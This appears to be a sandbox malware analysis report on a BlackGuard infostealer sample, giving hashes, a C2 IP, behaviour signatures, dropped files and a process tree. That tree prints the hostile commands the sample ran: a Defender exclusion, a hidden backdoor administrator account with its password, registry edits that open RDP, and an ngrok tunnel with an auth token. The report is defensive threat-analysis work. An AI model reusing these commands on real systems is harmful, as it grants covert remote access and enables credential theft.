Analysis

  • max time kernel
    153s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2023 12:06

General

  • Target

    Build1.exe

  • Size

    115KB

  • MD5

    bfaa027a645e567824a10a26fb8dbefd

  • SHA1

    4ab52a0b1cc105a5462c2255ef84be9af431b82e

  • SHA256

    c67b6f45d0beb461838f87ca2ad4774b52d7ccf9b0fa36652e8642dc72f43302

  • SHA512

    2f7ab0e4451cfeec017ba294cfcbc6f02d85c756bebce1cf9b3c69f6c77386fe9a21897734c44f4aa32dcaf3a1b7fbaaf0c4639edab1c8961761767a656b4569

  • SSDEEP

    1536:ztCbuEYE+9z2wpuFavGmhMnDIhzZtz20tnh/:5CbuAsEFNmhMnDIhNI0tnh/

Malware Config

Extracted

Family

blackguard

C2

http://94.142.138.111

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Build1.exe
    "C:\Users\Admin\AppData\Local\Temp\Build1.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
      "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
      2⤵
      • Allows Network login with blank passwords
      • Checks computer location settings
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Adds Run key to start application
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4044
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2680
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3916
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4324
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3464
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2780
              • C:\Windows\system32\find.exe
                Find "="
                7⤵
                  PID:2280
              • C:\Windows\system32\net.exe
                net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:552
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
                  7⤵
                    PID:3552
                • C:\Windows\system32\net.exe
                  net localgroup Administrators BlackTeam /add
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4392
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators BlackTeam /add
                    7⤵
                      PID:4092
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3376
                    • C:\Windows\System32\Wbem\WMIC.exe
                      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4796
                    • C:\Windows\system32\find.exe
                      Find "="
                      7⤵
                        PID:4876
                    • C:\Windows\system32\net.exe
                      net localgroup "Remote Desktop Users" BlackTeam /add
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2828
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add
                        7⤵
                          PID:4104
                      • C:\Windows\system32\net.exe
                        net accounts /forcelogoff:no /maxpwage:unlimited
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4192
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                          7⤵
                            PID:4168
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                          6⤵
                            PID:1884
                          • C:\Windows\system32\reg.exe
                            reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f
                            6⤵
                              PID:3396
                            • C:\Windows\system32\reg.exe
                              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f
                              6⤵
                                PID:1532
                              • C:\Windows\system32\reg.exe
                                reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f
                                6⤵
                                  PID:2152
                                • C:\Windows\system32\reg.exe
                                  reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f
                                  6⤵
                                    PID:1640
                                  • C:\Windows\system32\reg.exe
                                    reg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f
                                    6⤵
                                      PID:5100
                                    • C:\Windows\system32\attrib.exe
                                      attrib C:\users\BlackTeam +r +a +s +h
                                      6⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:2716
                              • C:\Windows\System32\fodhelper.exe
                                "C:\Windows\System32\fodhelper.exe"
                                3⤵
                                  PID:336
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of WriteProcessMemory
                                    PID:3828
                                    • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
                                      5⤵
                                      • Executes dropped EXE
                                      PID:5008
                                • C:\Windows\System32\fodhelper.exe
                                  "C:\Windows\System32\fodhelper.exe"
                                  3⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5084
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of WriteProcessMemory
                                    PID:2280
                                    • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
                                      5⤵
                                      • Executes dropped EXE
                                      • Modifies system certificate store
                                      PID:2828
                                • C:\Windows\System32\fodhelper.exe
                                  "C:\Windows\System32\fodhelper.exe"
                                  3⤵
                                    PID:4692
                                    • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                      "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2768
                                      • C:\Users\Admin\AppData\Local\Temp\vhttd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
                                        5⤵
                                        • Sets DLL path for service in the registry
                                        • Executes dropped EXE
                                        • Modifies WinLogon
                                        • Drops file in System32 directory
                                        • Drops file in Program Files directory
                                        PID:3900
                                        • C:\Windows\SYSTEM32\netsh.exe
                                          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                          6⤵
                                          • Modifies Windows Firewall
                                          PID:2512
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                  PID:3688
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                  1⤵
                                  • Loads dropped DLL
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1848

                                Network

                                MITRE ATT&CK Enterprise v6

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Program Files\RDP Wrapper\rdpwrap.dll

                                  Filesize

                                  48KB

                                  MD5

                                  678a88c83e62ff5bf041a9ba87243fb4

                                  SHA1

                                  91a3c580f17172ed2c8d419af4b15e2c545d6a72

                                  SHA256

                                  c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

                                  SHA512

                                  5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  d85ba6ff808d9e5444a4b369f5bc2730

                                  SHA1

                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                  SHA256

                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                  SHA512

                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  ecceac16628651c18879d836acfcb062

                                  SHA1

                                  420502b3e5220a01586c59504e94aa1ee11982c9

                                  SHA256

                                  58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9

                                  SHA512

                                  be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  8584c7e766a10aab273f3404620a4db9

                                  SHA1

                                  2ec92bfc4982413c45d704ac17f3c85890f0cfbd

                                  SHA256

                                  9c96a5575d666f2c2da0bd438fcfed7176f5eff441b47fa89811e4f80e0c081a

                                  SHA512

                                  027cba1c2ea590e933415eb4c02e2c153a9ace378f9ae6adde5f38f8f694f5d63e7f0f2f636c4fb1fc64dcbd338bdc3fd66083b20e0dbe865868e12f2b1b18b4

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  446dd1cf97eaba21cf14d03aebc79f27

                                  SHA1

                                  36e4cc7367e0c7b40f4a8ace272941ea46373799

                                  SHA256

                                  a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                  SHA512

                                  a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                • C:\Users\Admin\AppData\Local\Temp\Snup.bat

                                  Filesize

                                  1KB

                                  MD5

                                  3bb16d80a3dbf1c6cdb06e52fcaab5ba

                                  SHA1

                                  59ab02029d135f93c5cd2b153d69663e216b1965

                                  SHA256

                                  6ad6b4cf1bc3786ceea552b17b244a49896ee703baf53d4008262790a79c97b5

                                  SHA512

                                  cec268b374ea8b739aaf72708d58bd425b79a411e9241ea6adfa44eb40204ed6ec509609e40b53fb6c468e037bc4b762a38a9160bf5e746c06c622e3fada5dcb

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvhmi53p.f5k.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  e695b8888af3b57f1a56961bd289463c

                                  SHA1

                                  e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                  SHA256

                                  c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                  SHA512

                                  3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                                • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  e695b8888af3b57f1a56961bd289463c

                                  SHA1

                                  e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                  SHA256

                                  c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                  SHA512

                                  3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                                • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  e695b8888af3b57f1a56961bd289463c

                                  SHA1

                                  e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                  SHA256

                                  c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                  SHA512

                                  3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                                • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                  Filesize

                                  20.5MB

                                  MD5

                                  0de87b2cb6b4f4c247d7f28b01f3575a

                                  SHA1

                                  336aec3afaf84c8dc897eea14d207c5240d04312

                                  SHA256

                                  05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                  SHA512

                                  5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                                • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                  Filesize

                                  20.5MB

                                  MD5

                                  0de87b2cb6b4f4c247d7f28b01f3575a

                                  SHA1

                                  336aec3afaf84c8dc897eea14d207c5240d04312

                                  SHA256

                                  05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                  SHA512

                                  5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                                • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                  Filesize

                                  20.5MB

                                  MD5

                                  0de87b2cb6b4f4c247d7f28b01f3575a

                                  SHA1

                                  336aec3afaf84c8dc897eea14d207c5240d04312

                                  SHA256

                                  05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                  SHA512

                                  5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                                • C:\Users\Admin\AppData\Local\Temp\vhttd.exe

                                  Filesize

                                  445KB

                                  MD5

                                  2612258ab4e2221b52974b5c0154fffd

                                  SHA1

                                  2aa58664874516b338325d1fd8205421815b2cba

                                  SHA256

                                  833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

                                  SHA512

                                  02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

                                • C:\Users\Admin\AppData\Local\Temp\vhttd.exe

                                  Filesize

                                  445KB

                                  MD5

                                  2612258ab4e2221b52974b5c0154fffd

                                  SHA1

                                  2aa58664874516b338325d1fd8205421815b2cba

                                  SHA256

                                  833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

                                  SHA512

                                  02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

                                • C:\Users\Admin\AppData\Local\hndtbrK.FEror\Files\RemoveConnect.docx

                                  Filesize

                                  1.5MB

                                  MD5

                                  11255d5fd41b48f3c59ba5773ad50c9c

                                  SHA1

                                  8f3973f6e0965afcd886f8703d49cc12c8677777

                                  SHA256

                                  cfe9daadbb3b6bea2d3102b06cbccab01b684f8e2c85c8a646d36d2fcaa2e5c7

                                  SHA512

                                  c9ce38ff245c21f6847aba6ba39ee3344550e97dad40f56c96f252dd70338ec2d0af56b7e2b591945cec78f7cab9ce99edf0c18c7f606bd492c4fcde08f2ac48

                                • C:\Users\Admin\AppData\Local\hndtbrK.FEror\sysInformation.txt

                                  Filesize

                                  810B

                                  MD5

                                  f90ee56405427c068be79fdbc4b49927

                                  SHA1

                                  b815b33d96abe56b3f36f04bc0367159d1808c90

                                  SHA256

                                  44edcef231fd1e4c716a33cb5b1739a397723762bf49a3f27be2a65003594acb

                                  SHA512

                                  9fed9c58ffdc7dec1a61b3547cc49e7c934d9e6124d3fdb6ccb16e32de93d383ab5e6c33024159cb0a06e594f4fbfa76cffa807a6c2cb1f3e06733fd658365f9

                                • C:\Users\Admin\AppData\Local\ngrok\ngrok.yml

                                  Filesize

                                  74B

                                  MD5

                                  3f59f4babd65b227a58360b831b98788

                                  SHA1

                                  defec650f03d965ed0e30998d674a548a5ef4409

                                  SHA256

                                  e3746d47fd21a64b5d0f18226370a7e76a514b62dcc6a61174b103539600a945

                                  SHA512

                                  26c464abf8fb60aef8eeb7717257d032ed68cee51cc794d0821b79e4e86df490d85144ff35afad4ac293fbb10765099e04ddaf2b51ec01948aad210ff6b6195c

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  a03b71fcbaf1efbaf7be603b7d4dfb56

                                  SHA1

                                  fb5157543dcbdd08056ebaae93a7eed62fefac11

                                  SHA256

                                  f2f442dfe89c9f8b29b76d0845a8715e5fa0fd39d5a0ca2966cf8c7863d75524

                                  SHA512

                                  a8e934bf2e9915b579bc1e01df9a6486da4a91402c580470e2cd19540257e85696b6404bd6eba2922976dbca3e2a2cee159a83c2679b968270f083e8d95d122a

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  e12cbe64b5d4b7abba47d9652c7ae344

                                  SHA1

                                  f87a4b8938ff24d1260425e5d6bf529deab11cd7

                                  SHA256

                                  473aed296670d5b244124e23a53553d974f7e48d55090a9d640a4626caa9cf26

                                  SHA512

                                  39740a7a60d6bb5a753ce6329225b5442c62ac0b3050ec05de0f4fa786cec0de8857f6aa91f0c9f05ac01806de3e7bc6f05d1acba0417cb37cf5d9d980f7e316

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  e12cbe64b5d4b7abba47d9652c7ae344

                                  SHA1

                                  f87a4b8938ff24d1260425e5d6bf529deab11cd7

                                  SHA256

                                  473aed296670d5b244124e23a53553d974f7e48d55090a9d640a4626caa9cf26

                                  SHA512

                                  39740a7a60d6bb5a753ce6329225b5442c62ac0b3050ec05de0f4fa786cec0de8857f6aa91f0c9f05ac01806de3e7bc6f05d1acba0417cb37cf5d9d980f7e316

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  42ae45738b319eea2beaec138b7bd3d4

                                  SHA1

                                  7c2782b33c23ebc64b6779975f090b11b4773713

                                  SHA256

                                  d6299a352fd389a75c0a6edd99f19199fb09a15d08b733f69bd7e515cab47ed8

                                  SHA512

                                  cafe74644e95ae8bb0fa7fa89a93d4eb6f704c2971a50344173e7618ae1801161ca583007ef5163cbdccf23b544020fa0caff56e932d336093356b25d5b79496

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  42ae45738b319eea2beaec138b7bd3d4

                                  SHA1

                                  7c2782b33c23ebc64b6779975f090b11b4773713

                                  SHA256

                                  d6299a352fd389a75c0a6edd99f19199fb09a15d08b733f69bd7e515cab47ed8

                                  SHA512

                                  cafe74644e95ae8bb0fa7fa89a93d4eb6f704c2971a50344173e7618ae1801161ca583007ef5163cbdccf23b544020fa0caff56e932d336093356b25d5b79496

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  cbbe7aa1a337016666f1b405bb9a0ce1

                                  SHA1

                                  4c8dfd1832f2212d6ade1f2e2e8761a967a4c7e0

                                  SHA256

                                  9c0856092cb3dfdf85b139b81ac708d91ca3cd7f750f5312c7cb0af2147ac3c2

                                  SHA512

                                  a4a032a58c75679609c8c1e1813176a2533c3792ec390adb1431d9fdc3fe4f790cdb0c47e8f1a6aa041bfffb30b31c1f14f5a7545d6be007aa37e2ecbeb6e85d

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  cbbe7aa1a337016666f1b405bb9a0ce1

                                  SHA1

                                  4c8dfd1832f2212d6ade1f2e2e8761a967a4c7e0

                                  SHA256

                                  9c0856092cb3dfdf85b139b81ac708d91ca3cd7f750f5312c7cb0af2147ac3c2

                                  SHA512

                                  a4a032a58c75679609c8c1e1813176a2533c3792ec390adb1431d9fdc3fe4f790cdb0c47e8f1a6aa041bfffb30b31c1f14f5a7545d6be007aa37e2ecbeb6e85d

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  6KB

                                  MD5

                                  38b079799d4d0f4da4475c0b6be964ef

                                  SHA1

                                  06eb9cb3869d69372f48da79b43a57157c4e988d

                                  SHA256

                                  48256d37318098401b153c53408bf8e60cdcaf8241dff821f4bf9f23f3b5e001

                                  SHA512

                                  8ce92aabc3c05a61704642f13b1c5a67691b8811bc3d0d5fc832fc665e94d9a4b3bc883e092474e090d679d4e22428d7e0ba0a133ef2ce5ffee2d05bf2e30781

                                • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                  Filesize

                                  48KB

                                  MD5

                                  678a88c83e62ff5bf041a9ba87243fb4

                                  SHA1

                                  91a3c580f17172ed2c8d419af4b15e2c545d6a72

                                  SHA256

                                  c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

                                  SHA512

                                  5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

                                • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                  Filesize

                                  338KB

                                  MD5

                                  98082786e440be307873aafea2ea092e

                                  SHA1

                                  089f39ae279fec8fe2bf6d040457e9d3d566f348

                                  SHA256

                                  8de2b36a407ebc818459d6792b3f14cad6372a9c4756eeffeaf8455ccfba16e5

                                  SHA512

                                  2d069b1f6144cba156eb9734b074a8c2bc42bfce14baa622c25c29d5ca81a8bdc6076eb134b0c4eaa99e834a7cae69c69c7a6e88b86e8d5b2afbf58193b908a9

                                • memory/1848-317-0x00007FFC247D0000-0x00007FFC247F6000-memory.dmp

                                  Filesize

                                  152KB

                                • memory/2220-133-0x000001B696100000-0x000001B69611A000-memory.dmp

                                  Filesize

                                  104KB

                                • memory/2220-136-0x000001B6B06B0000-0x000001B6B06C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2220-134-0x000001B6B06B0000-0x000001B6B06C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-287-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-282-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-283-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-284-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-288-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2280-289-0x0000024BC1B80000-0x0000024BC1B90000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2680-176-0x00000286EBD40000-0x00000286EBD50000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2768-307-0x000001AD51310000-0x000001AD51320000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2768-308-0x000001AD51310000-0x000001AD51320000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2768-309-0x000001AD51310000-0x000001AD51320000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3828-258-0x000001FFD8A20000-0x000001FFD8A30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3828-257-0x000001FFD8A20000-0x000001FFD8A30000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3900-310-0x0000000000400000-0x0000000000592000-memory.dmp

                                  Filesize

                                  1.6MB

                                • memory/3900-318-0x0000000000400000-0x0000000000592000-memory.dmp

                                  Filesize

                                  1.6MB

                                • memory/3916-225-0x0000028364930000-0x0000028364940000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3916-226-0x0000028364930000-0x0000028364940000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3916-230-0x0000028364930000-0x0000028364940000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/3916-231-0x0000028364930000-0x0000028364940000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4044-178-0x0000029770920000-0x0000029770970000-memory.dmp

                                  Filesize

                                  320KB

                                • memory/4044-177-0x0000029770AA0000-0x0000029770C62000-memory.dmp

                                  Filesize

                                  1.8MB

                                • memory/4044-181-0x00000297709F0000-0x0000029770A66000-memory.dmp

                                  Filesize

                                  472KB

                                • memory/4044-169-0x000002976FFB0000-0x000002976FFC0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4044-150-0x0000029770240000-0x0000029770262000-memory.dmp

